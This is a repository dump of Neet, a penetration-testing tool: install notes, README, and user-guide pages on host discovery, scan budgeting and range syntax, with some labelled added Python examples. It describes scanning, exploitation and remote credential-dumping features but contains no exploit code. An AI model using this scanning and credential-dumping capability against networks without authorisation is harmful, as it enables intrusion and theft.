├── INSTALL
├── LICENSE
├── README.md
├── VERSION
├── content
├── VERSION
├── doc
│   ├── .gitignore
│   ├── NeetUserGuide.html
│   ├── credentials.html
│   ├── gsms.html
│   ├── guide.html
│   ├── hostdiscovery.html
│   ├── images
│   │   ├── bkg.png
│   │   └── blacktocat.png
│   ├── index.html
│   ├── javascripts
│   │   └── main.js
│   ├── news.html
│   ├── params.json
│   ├── performance.html
│   ├── quickstart.html
│   ├── serviceid.html
│   ├── stylesheets
│   │   ├── pygment_trac.css
│   │   ├── stylesheet-wider.css
│   │   └── stylesheet.css
│   └── terminology.html
├── install.sh
├── install
│   ├── checkdeps.pl
│   ├── checkdeps.pm
│   ├── coreinstall.sh
│   ├── dependencies.conf
│   ├── githubVersion
│   ├── installsupport
│   ├── locations
│   ├── messages.dat
│   └── pkg
│   │   ├── backtrack
│   │   ├── debian
│   │   ├── debian-8
│   │   ├── kali
│   │   ├── kali-1.0
│   │   ├── kali-kali-rolling
│   │   ├── linuxmint-17
│   │   ├── linuxmint-17.1
│   │   ├── linuxmint-17.2
│   │   ├── linuxmint-17.3
│   │   ├── linuxmint-18
│   │   ├── ubuntu-12.04
│   │   ├── ubuntu-14.04
│   │   └── ubuntu-16.04
├── main
│   ├── JR
│   │   ├── Files
│   │   │   └── Config.pm
│   │   ├── NetUtils
│   │   │   ├── NetUtils.pm
│   │   │   ├── Ranges.pm
│   │   │   └── WHOIS.pm
│   │   ├── Parsers
│   │   │   ├── CLI.pm
│   │   │   ├── Nmap.pm
│   │   │   └── OutputParser.pm
│   │   ├── Process
│   │   │   ├── RCE.pm
│   │   │   ├── RemoteCommandExecution.pm
│   │   │   └── ThreadPool.pm
│   │   └── iShell
│   │   │   ├── ConnectorCPCE.pm
│   │   │   ├── ConnectorIISUnicode.pm
│   │   │   ├── ConnectorNativeMSSQL.pm
│   │   │   ├── ConnectorRCE.pm
│   │   │   ├── ConnectorSQLInject.pm
│   │   │   ├── OutputIsolator.pm
│   │   │   ├── iShell.pm
│   │   │   └── iShellSQL.pm
│   ├── Neet
│   │   ├── API.pm
│   │   ├── CredentialManager.pm
│   │   ├── GlobalServiceMonitor.pm
│   │   ├── Logging.pm
│   │   ├── MainScan.pm
│   │   ├── OSDetect.pm
│   │   ├── ServiceDiscovery.pm
│   │   ├── Util.pm
│   │   ├── VceConfig.pm
│   │   └── threads.pm
│   ├── bin
│   │   ├── aliases.pl
│   │   ├── allTcpPorts
│   │   ├── fwdetect
│   │   ├── ip2name
│   │   ├── memo
│   │   ├── neet
│   │   ├── neet-update
│   │   ├── neet_exploit
│   │   ├── netconfig
│   │   └── updateLocations
│   ├── etc
│   │   ├── neet.conf
│   │   └── vce.conf
│   └── man
│   │   ├── neet-qs.1.gz
│   │   ├── neet.1.gz
│   │   └── neetsh.1.gz
└── uninstall.sh
└── install.sh

/INSTALL:
--------------------------------------------------------------------------------
A quick note: Neet runs on Linux, and is unlikely to work on other operating
systems - I've never tested it on anything else. It most definitely won't work
on Windows, and it's unlikely to work under Cygwin. If you normally use
another OS, just grab yourself a Kali Linux ISO and build yourself a Kali VM
in which to install Neet. It will make life far easier.

Neet has a significant number of dependencies, largely thanks to the modules
which test various services. However, the installer takes care of most of
the dependency checking for you - if you have missing dependencies then
these will be listed so you can get them from source or using your package
manager of choice.

Missing critical dependencies will stop the installation. You can redo the
installation once you have satisfied the critical requirements.

Recommended dependencies will trigger warnings if they are missing, and
they may well break some functionality, but Neet will continue to function.
These will not stop installation, but will be listed in a text file for
you to resolve.

** IMPORTANT **
If you have installed neet and there are unresolved dependencies, run
/opt/neet/bin/updateLocations once you have resolved them. This will
ensure that the functionality for which they are required will be
configured to use them.

Having said all that, installation of Neet is pretty simple on most
modern distributions, and if you use Kali or Backtrack, the installer
will pre-fetch certain dependencies for you as long as you have a
working Internet connection that your package manager can use. In these
cases installation is an extremely simple process.

In all cases, start the installation process by running "./install.sh"
as root.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
NEET - Network Enumeration and Exploitation Tool

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.

It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.

All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.

There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.

There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML documentation in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

In summary, Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.

Neet is released under version 3 of the GNU Public License. See the LICENSE file for details.

Copyright 2008-2016 Jonathan Roach
Email: jonnyhightower [at] funkygeek.com

Some of the main features include:

Single interface to co-ordinate many tools;

Port scans and service identification are done in batches, so useful results appear early on;

Easy to specify ranges to include and exclude, both for IP addresses and ports;

Doesn't create more traffic than is strictly necessary;

Detailed, timestamped logging;

All raw tool output available, as well as sensibly-arranged output in text format;

Customisable speed and intensity;

Reliable scanning from multiple interfaces and over VPNs;

Scan control allows you to pause / resume the scan;

Cancel scans on individual hosts;

Monitor progress of the scanning;

Very configurable;

Neet shell (neetsh) is bash shell with many aliases for getting through results quickly;

Exploitation for specific exploits included in the Neet shell;

Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;

Online incremental updates without having to do a full reinstall each time;

Documentation: man pages, HTML help and the help command in the Neet shell;

Many more.

** INSTALLATION **

Owing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required. For the Debian, Ubuntu, Kali and Mint Linux distributions, the required prerequisites will be installed using APT prior to the main installation process.

See the INSTALL file for installation instructions.

--------------------------------------------------------------------------------
/VERSION:
--------------------------------------------------------------------------------
1.2.7
--------------------------------------------------------------------------------
/content/VERSION:
--------------------------------------------------------------------------------
1.2.7
--------------------------------------------------------------------------------
/content/doc/.gitignore:
--------------------------------------------------------------------------------
C\:\\nppdf32Log\\debuglog.txt
docnotes.txt
C:\nppdf32Log\debuglog.txt
bugsAndPlanning.html
NeetUserGuide.html
--------------------------------------------------------------------------------
/content/doc/gsms.html:
--------------------------------------------------------------------------------
Neet User Guide: Global Service Monitors

Neet User Guide

The Global Service Monitors (GSMs)

The Global Service Monitors are the modules which test each service as it is recorded (provided there is enough spare budget; if there isn't then the service is queued). They are Perl modules, loaded into memory when neet starts by the GlobalServiceMonitor.pm core neet module. They are run in a strict environment, and any module which fails to parse properly is not loaded; the failure is logged, and neet will function as normal without the broken module. Obviously whichever functionality the module was meant to provide will be missing from the scans.

The simplest way to add a new module is to change into the /opt/neet/modules/ directory and copy the Template.gsm.temp file, renaming it to reflect the function of the module. The Global Service Monitor handler module will attempt to load any file in this directory that has the .gsm extension, which is the reason for the template module having a .temp extension.

The template module is well commented, and it should be fairly simple to configure the options near the top of the script. There are a few rules which must be followed:


The template module contains all of the code necessary for the module to function properly within neet, including the advanced functionality such as pause/resume, multi-threading, budget control and queueing etc. All that needs to be added is the test-specific code, which should be inserted into the activate() function, where the CODE GOES HERE banner is found.


There is an API reference in the comments of that section, so you will know what information is already available to your module and how to record vulnerabilities and other messages, and log in a standard way that does not cause havoc with file locks.

--------------------------------------------------------------------------------
/content/doc/guide.html:
--------------------------------------------------------------------------------
Neet: User Guide

Neet User Guide

What Neet does and how it does it

This user guide aims to help you get started using Neet quickly. As well as giving you some quick start tips, the guide contains a detailed reference explaining the methodologies used and performance tuning hints.

Table of contents

Basic Usage

More in-depth

As yet unwritten but in progress...

--------------------------------------------------------------------------------
/content/doc/hostdiscovery.html:
--------------------------------------------------------------------------------
Neet User Guide: Host Discovery

Neet User Guide

How Neet discovers hosts

The discovery method for target hosts is dependent on each host's proximity to the scanning host. Neet begins with two broad-brushed types of host: local and remote. Remote hosts are further classed as internet, if the -I (--internet) option was passed on the command line, or vpn, if they are accessed via an interface type listed in the Internet.VPN parameter in the config file.

Local Discovery

Neet uses ARP for discovery of targets which lie within the address ranges of a local interface, and classes them as local hosts. Where network ranges are specified as addresses, each target is discovered individually, immediately prior to port-scanning. Where network interfaces are specified, the entire network ranges for the interfaces are ARP-scanned, and the respondents deemed to be the targets.


For addresses, or ranges of addresses, neet calculates the locality of each target on an individual basis at scan time. It is conceivable that there could be a mix of local and non-local hosts in the same scan.

Remote Discovery

Remote hosts are those which are accessed through a gateway. ARP is not available as a reliable detection mechanism for them, and therefore hosts are assumed to be UP all the way through the scans. This can mean scans take a long time: if a large address space is being scanned and there are not many live hosts present, a lot of time will be taken up scanning empty address space, using time and SDM threads that would be more usefully deployed on live hosts. However, from a thorough discovery point of view, the full scans must be completed on each host to provide maximum assurance that there isn't a host listening on just one obscure high-end port.

The -p (--pingscan) option can be used to accelerate host discovery in such situations: hosts will only be considered live if they respond to an ICMP Echo request or a TCP connection attempt to TCP/80. If there is no response to either probe, the host will be considered down and no more scanning of that address will take place.

The difficulty is that it is common for hosts to be firewalled off, and it should be confirmed with the network administrators whether hosts are likely to respond to such ping requests or not. If some hosts are deployed with host-based firewalls, this scan is likely to miss those hosts.

An alternative option in such circumstances is a recent addition to neet: the --limited-patience (-l) option. This applies only to non-local hosts - those which cannot be discovered using ARP. Limited Patience is a mode in which Neet assumes that all hosts are up for the duration of the named range scans. However, hosts which haven't responded to any of TCP, UDP or ICMP by the end of the named range scans are considered to be down, and are ignored from that point on. This frees up SDM threads to move on to scan the next addresses in the target range, and ultimately means that progress through the network address space is far quicker.

Bear in mind that with this convenience there is an implicit risk that hosts which expose only services that are outside the ports in the named ranges will be incorrectly classified as dead, and the live services overlooked. The operator should make a judgement call as to whether this is an acceptable risk based on discussions with the local network team, the scope of work and the available time.
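
The coverage trade-off between the three remote-discovery modes, as an added Python model (not Neet's code, and it sends no traffic). The host inventory is constructed, and `NAMED_RANGE_PORTS` is an assumed stand-in for the ports in Neet's named ranges, which this page does not list.

```python
from dataclasses import dataclass

# Assumption: stand-in for the ports covered by Neet's "named ranges".
NAMED_RANGE_PORTS = frozenset({21, 22, 23, 25, 53, 80, 135, 139, 161, 443, 445, 3389})


@dataclass(frozen=True)
class Host:
    name: str
    local: bool = False                     # inside a local interface's address range
    icmp_echo: bool = False                 # answers an ICMP Echo request
    tcp_reply_ports: frozenset = frozenset()  # ports that return any TCP reply
    udp_reply_ports: frozenset = frozenset()  # ports that return any UDP reply


def considered_live(host, mode):
    """Liveness decision for one host.

    mode is 'default', 'pingscan' (-p) or 'limited-patience' (-l).
    """
    if host.local:
        # Local targets are discovered by ARP in every mode.
        return True
    if mode == "default":
        # Remote hosts are assumed up for the whole scan.
        return True
    if mode == "pingscan":
        # Live only if ICMP Echo or a connection attempt to TCP/80 is answered.
        return host.icmp_echo or 80 in host.tcp_reply_ports
    if mode == "limited-patience":
        # Live if anything answered by the end of the named range scans.
        return (
            host.icmp_echo
            or bool(host.tcp_reply_ports & NAMED_RANGE_PORTS)
            or bool(host.udp_reply_ports & NAMED_RANGE_PORTS)
        )
    raise ValueError(f"unknown mode: {mode!r}")


def missed_hosts(hosts, mode):
    """Names of hosts that are really up but would be written off as down."""
    return [h.name for h in hosts if not considered_live(h, mode)]


# Constructed inventory: every host below is up.
INVENTORY = [
    Host("web", tcp_reply_ports=frozenset({80, 443})),
    Host("fw-ssh", tcp_reply_ports=frozenset({22})),      # host firewall, SSH only
    Host("odd-port", tcp_reply_ports=frozenset({49152})),  # one obscure high port
    Host("pingable", icmp_echo=True),
    Host("lan-box", local=True),
]

if __name__ == "__main__":
    for mode in ("default", "pingscan", "limited-patience"):
        print(f"{mode:17} misses {missed_hosts(INVENTORY, mode)}")
```

The same model can be fed a known asset list to estimate how much of it a faster discovery mode would leave unscanned before agreeing the scan options with the network team.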


VPN and Internet hosts are discovered in the same way as remote hosts. The only difference in their treatment is the differing speed and intensity profiles selected depending on their location. These profiles are all contained within the configuration file /opt/neet/etc/neet.conf.

--------------------------------------------------------------------------------
/content/doc/images/bkg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/doc/images/bkg.png
--------------------------------------------------------------------------------
/content/doc/images/blacktocat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/doc/images/blacktocat.png
--------------------------------------------------------------------------------
/content/doc/index.html:
--------------------------------------------------------------------------------
Neet, Network Enumeration and Exploitation Tool: Project Page

Neet

Neet Project Page

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.


Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.


It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.


Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.


All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.


There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.


There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML Wiki document in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

In summary...

Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.


Neet is released under version 3 of the GNU Public License. See the LICENSE file for details.

Copyright 2008-2016 Jonathan Roach
Email: jonnyhightower [at] funkygeek.com

Some of the main features include:

INSTALLATION

Owing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required. For the Ubuntu and Kali Linux distributions, the required prerequisites will be installed using APT prior to the main installation process.


See the INSTALL file for installation instructions.

--------------------------------------------------------------------------------
/content/doc/javascripts/main.js:
--------------------------------------------------------------------------------
console.log('This would be the main JS file.');
--------------------------------------------------------------------------------
/content/doc/params.json:
--------------------------------------------------------------------------------
{"name":"Neet","tagline":"Neet - Network Enumeration and Exploitation Tool","body":"Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure, You might want to try it out if you fall into one of those categories.\r\n\r\nIt has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.\r\n\r\nNeet has a simple (though powerful and flexible) command-line interface, and gathers a lot of data about the network within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.\r\n\r\nIt's not magic, but it does what it says on the tin: network enumeration and exploitation. 
All the information gathered is stored in plain text files, so they can be grepped and awked as the user sees fit, although as well as storing the raw data, it does aggregate a lot of it into files of related information for easy processing.\r\n\r\nThere's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple tasks. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live hosts.\r\n\r\nAnd there's documentation too! Check out the man pages, the help command inside the neet shell, and the HTML Wiki document in /opt/neet/doc. Also, please check out [the wiki](https://github.com/JonnyHightower/neet/wiki) for the latest news and issue tracking/feature requests.\r\n\r\n###In other words...\r\n\r\nNeet is a flexible, multi-threaded network penetration test tool which runs on Linux and co-ordinates the use of numerous other open-source network tools to gather as much network information as possible in an easily-understood format. The core identifies network services, the modules test or enumerate those services, and the neet shell provides an integrated environment for processing the results and exploiting known vulnerabilities.\r\n\r\nAs such, Neet sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated VA tool. Neet has many options which allow the user to tune the test parameters for network scanning in the most reliable and practical way.\r\n\r\nNeet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain a great deal of insight into the operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible. 
\r\n\r\nOwing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required.\r\n\r\n***\r\nNeet is released under version 3 of the GNU Public License. See the LICENSE file for details.\r\n\r\nCopyright 2008-2016 Jonathan Roach\r\nEmail: jonnyhightower [at] funkygeek.com\r\n\r\nSome of the main features include:\r\n\r\n* Single interface to co-ordinate many tools;\r\n* Port scans and service identification are done in batches, so useful results appear early on;\r\n* Easy to specify ranges to include and exclude, both for IP addresses and ports;\r\n* Doesn't create more traffic than is strictly necessary;\r\n* Detailed, timestamped logging;\r\n* All raw tool output available, as well as sensibly-arranged output in text format;\r\n* Customisable speed and intensity;\r\n* Reliable scanning from multiple interfaces and over VPNs;\r\n* Scan control allows you to pause / resume the scan;\r\n* Cancel scans on individual hosts;\r\n* Monitor progress of the scanning;\r\n* Very configurable;\r\n* Neet shell (neetsh) is bash shell with many aliases for getting through results quickly;\r\n* Exploitation for specific exploits included in the Neet shell;\r\n* Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;\r\n* Online incremental updates without having to do a full reinstall each time;\r\n* Documentation! man pages and \"help\" command in the Neet shell;\r\n*Many more.\r\n\r\n###INSTALLATION\r\n\r\nSee the INSTALL file for installation instructions.\r\n\r\n","google":"","note":"Don't delete this file! 
It's used internally to help with page regeneration."}
--------------------------------------------------------------------------------
/content/doc/performance.html:
--------------------------------------------------------------------------------
Neet User Guide: Performance

Neet User Guide

Tweaking the performance of your scans

Without some kind of resource limits, neet would consume all available resources to complete the scans as quickly as possible. In practice, this would result in the scanning host becoming unresponsive, especially if other resource-intensive applications - such as Virtual Machines - were running on the same host. To combat this, neet uses a cost/budget system to prevent new scans starting when the available resources have been assigned.


When neet starts, it has a default budget figure which has been set in the configuration file or on the command line. Each scan thread has a notional cost assigned to it: each Service Discovery Module thread for example has a cost of 10, whilst each Global Service Monitor module has a cost assigned which relates to the resources it consumes - the more resource intensive, the higher the cost. The GSM costs are allocated by the module authors and are coded into the modules.


When neet starts any scan, its cost is deducted from the available budget, and returned to the budget when the scan finishes. If the scheduler wants to start a scan but the budget has been used, the scan is queued until budget becomes available again. The budget can be manually adjusted during the scan from the neet shell, to compensate for under- or over-loading of the scanning host. Increasing the budget will immediately allow some of the queued scans to be started, up to the new budget figure. Decreasing the budget will prevent new scans starting until enough existing scans have finished to release some budget again.

However, the budget is automatically trimmed, both upwards and downwards, based on the system's load average. If the system is underloaded, the budget is gradually increased to allow more scans to run simultaneously, using up spare capacity. Conversely, if the system is overloaded, the budget is reduced. This will prevent new scans from starting until existing scans have finished and the scanning cost meets the new budget. In this way, the load on the system is reduced. This automatic trimming of the budget can be disabled on the command line prior to starting a scan.
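
The cost/budget accounting described above, as an added Python example (not Neet's own Perl code). Only the SDM thread cost of 10 comes from the guide; the strict first-in-first-out queue, the GSM cost used in the test, and the load-average thresholds and step in `trim` are assumptions.

```python
from collections import deque

SDM_COST = 10  # cost of one Service Discovery Module thread, per the guide


class BudgetScheduler:
    """Admit scans while their total cost fits the budget; queue the rest."""

    def __init__(self, budget):
        self.budget = budget      # current ceiling on total running cost
        self.spent = 0            # cost of everything running right now
        self.running = {}         # scan name -> cost
        self.queue = deque()      # (name, cost) waiting for budget

    def submit(self, name, cost):
        """Ask to start a scan; returns the names actually started."""
        self.queue.append((name, cost))
        return self._drain()

    def finish(self, name):
        """A scan ended: its cost goes back to the budget."""
        self.spent -= self.running.pop(name)
        return self._drain()

    def set_budget(self, budget):
        """Manual adjustment, as from the neet shell."""
        self.budget = budget
        return self._drain()

    def trim(self, load_avg, low=1.0, high=4.0, step=10):
        """Automatic trimming from the load average.

        Assumption: the thresholds and step size are illustrative values.
        """
        if load_avg < low:
            self.budget += step
        elif load_avg > high:
            self.budget = max(0, self.budget - step)
        return self._drain()

    def _drain(self):
        # Assumption: strict FIFO, so a costly scan at the head of the
        # queue holds back cheaper scans behind it.
        started = []
        while self.queue and self.spent + self.queue[0][1] <= self.budget:
            name, cost = self.queue.popleft()
            self.running[name] = cost
            self.spent += cost
            started.append(name)
        return started


if __name__ == "__main__":
    s = BudgetScheduler(budget=30)
    for i in range(1, 5):
        print(f"submit sdm-{i}:", s.submit(f"sdm-{i}", SDM_COST))
    print("raise budget to 40:", s.set_budget(40))
    print("overloaded host:", s.trim(load_avg=6.0), "budget now", s.budget)
```

Lowering the budget never stops a running scan in this model: `spent` may sit above `budget` until enough scans call `finish`, which matches the behaviour the paragraph describes.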

In-Scan Tuning

TO BE COMPLETED

--------------------------------------------------------------------------------
/content/doc/quickstart.html:
--------------------------------------------------------------------------------
Neet User Guide: Getting started

Neet User Guide

Getting started

Internal Network Scans

The most common type of scan you will run with neet is simply 'neet range', where range is some IP address range on an internal network somewhere.

neet 10.24.25.129/25

This will set up a scan which incorporates all modules and functionality. The user will be shown the test parameters, and asked to accept them before the scan commences. Once the scan is running, neet will show an overview of the test progression, highlighting issues and vulnerabilities found. You can interact with the results in a regular system shell, but the easiest way is to use the neet shell (see Neet Terminology), which has a lot of useful functionality.


Scanning ranges can be specified in a number of formats. For example, the above range could alternatively be expressed as 10.24.25.129-254, excluding network and broadcast addresses (these special addresses will be automatically excluded from scan ranges which have been specified using CIDR notation).

Ranges may be specified within any IPv4 octet. For example, 10.24.25-28.129-254.
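The range formats described above, expanded into explicit address lists and checked against an authorised scope before a scan is started. This is an added example, not code from neet; the function names and the authorised network in the test data are assumptions, and interface names such as eth0 are deliberately rejected rather than resolved.

```python
"""Expand neet-style IPv4 target specifications (added illustration, not neet code)."""
import ipaddress
import itertools


def _octet_values(field):
    """Return the integers described by one octet field: '25' or '25-28'."""
    lo, dash, hi = field.partition("-")
    lo = int(lo)                      # raises ValueError for non-numeric input
    hi = int(hi) if dash else lo      # '25-' raises ValueError here
    if not (0 <= lo <= hi <= 255):
        raise ValueError(f"bad octet range: {field!r}")
    return list(range(lo, hi + 1))


def expand_target(spec):
    """Expand one CIDR or octet-range specification into an ordered address list."""
    if "/" in spec:
        # strict=False accepts a host address such as 10.24.25.129/25 and
        # normalises it to the enclosing network (10.24.25.128/25).
        net = ipaddress.ip_network(spec, strict=False)
        # hosts() omits the network and broadcast addresses, matching the
        # behaviour the guide describes for CIDR notation.
        return list(net.hosts())
    fields = spec.split(".")
    if len(fields) != 4:
        raise ValueError(f"expected four dotted octets: {spec!r}")
    combos = itertools.product(*(_octet_values(f) for f in fields))
    return [ipaddress.IPv4Address(".".join(map(str, c))) for c in combos]


def out_of_scope(specs, authorised):
    """Return every expanded address that lies outside all authorised networks."""
    allowed = [ipaddress.ip_network(n) for n in authorised]
    stray = []
    for spec in specs:
        for addr in expand_target(spec):
            if not any(addr in net for net in allowed):
                stray.append(addr)
    return stray


if __name__ == "__main__":
    # Specifications taken from the guide; the authorised scope is constructed.
    for spec in ("10.24.25.129/25", "10.24.25.129-254", "10.24.25-28.129-254"):
        addrs = expand_target(spec)
        print(f"{spec:22} {len(addrs):4} addresses  {addrs[0]} .. {addrs[-1]}")
    stray = out_of_scope(["192.168.1-10.1-254"], ["192.168.0.0/21"])
    print(f"{len(stray)} addresses outside the authorised scope, first: {stray[0]}")
```

Running the scope check on the exact arguments that will be passed to neet catches an octet range that silently spills into a neighbouring subnet.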

If you want to scan the entire subnet to which your machine is connected, the quickest method is usually to specify the relevant network interface(s). For example, to scan everything connected to eth0, just use neet eth0. Specifying a network interface to scan from causes neet to perform a network-wide ARP scan of the address range in which the interface is configured, and then target only the hosts which provided an ARP response. All other address specification types cause neet to perform appropriate host discovery on a per-address basis.

Neet will happily scan from multiple interfaces simultaneously, choosing the best interface for each target based on the host's routing table. It is perfectly valid to express multiple target ranges in mixed formats. In the following example there are three separate address ranges being scanned in the same scan run:

neet wlan0 192.168.1-10.1-254 eth1

To view all the available command-line options, run neet in a fresh directory with no options, or with the -h (--help) option. Alternatively, see the neet man page or the Scanning Options section.

Scanning Internet Hosts

Neet usage in these cases is very similar to non-Internet scans, except that the -I (--internet) flag should be specified on the command line to indicate Internet mode (see Neet Terminology). The user will be shown WHOIS records of the target address range(s), and asked to confirm that they have permission to test the targets before the test will start.

In Internet mode, or when scanning any group of non-local hosts, you may wish to tune the criteria used to determine when a host is considered dead or alive, as non-local hosts are likely to be filtered and cannot be reached via ARP. This is discussed in the Host Discovery section.

Excluding Operating Systems

Neet allows you to exclude hosts from further scanning based on the operating system detected. For example, if a client tells you not to bother scanning their 250 XP workstations as they are being decommissioned next week, you can use the -O (--exclude-os) option to achieve this, specifying a regex that will match some unique part of the OS name. For example:

neet eth0 --exclude-os=XP

This would initially cause all machines on the eth0 network to be scanned. However, scans will be stopped on any machines identified as running Windows XP as soon as the OS identification is made.

--------------------------------------------------------------------------------
/content/doc/stylesheets/pygment_trac.css:
--------------------------------------------------------------------------------
.highlight .c { color: #999988; font-style: italic } /* Comment */
.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */
.highlight .k { font-weight: bold } /* Keyword */
.highlight .o { font-weight: bold } /* Operator */
.highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */
.highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */
.highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */
.highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */
.highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #aa0000 } /* Generic.Error */
.highlight .gh { color: #999999 } /* Generic.Heading */
.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */
.highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */
.highlight .go { color: #888888 } /* Generic.Output */
.highlight .gp { color: #555555 } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold; } /* Generic.Subheading */
.highlight .gt { color: #aa0000 } /* Generic.Traceback */
.highlight .kc { font-weight: bold } /* Keyword.Constant */
.highlight .kd { font-weight: bold } /* Keyword.Declaration */
.highlight .kn { font-weight: bold } /* Keyword.Namespace */
.highlight .kp { font-weight: bold } /* Keyword.Pseudo */
.highlight .kr { font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */
.highlight .m { color: #009999 } /* Literal.Number */
.highlight .s { color: #d14 } /* Literal.String */
.highlight .na { color: #008080 } /* Name.Attribute */
.highlight .nb { color: #0086B3 } /* Name.Builtin */
.highlight .nc { color: #445588; font-weight: bold } /* Name.Class */
.highlight .no { color: #008080 } /* Name.Constant */
.highlight .ni { color: #800080 } /* Name.Entity */
.highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #990000; font-weight: bold } /* Name.Function */
.highlight .nn { color: #555555 } /* Name.Namespace */
.highlight .nt { color: #CBDFFF } /* Name.Tag */
.highlight .nv { color: #008080 } /* Name.Variable */
.highlight .ow { font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mf { color: #009999 } /* Literal.Number.Float */
.highlight .mh { color: #009999 } /* Literal.Number.Hex */
.highlight .mi { color: #009999 } /* Literal.Number.Integer */
.highlight .mo { color: #009999 } /* Literal.Number.Oct */
.highlight .sb { color: #d14 } /* Literal.String.Backtick */
.highlight .sc { color: #d14 } /* Literal.String.Char */
.highlight .sd { color: #d14 } /* Literal.String.Doc */
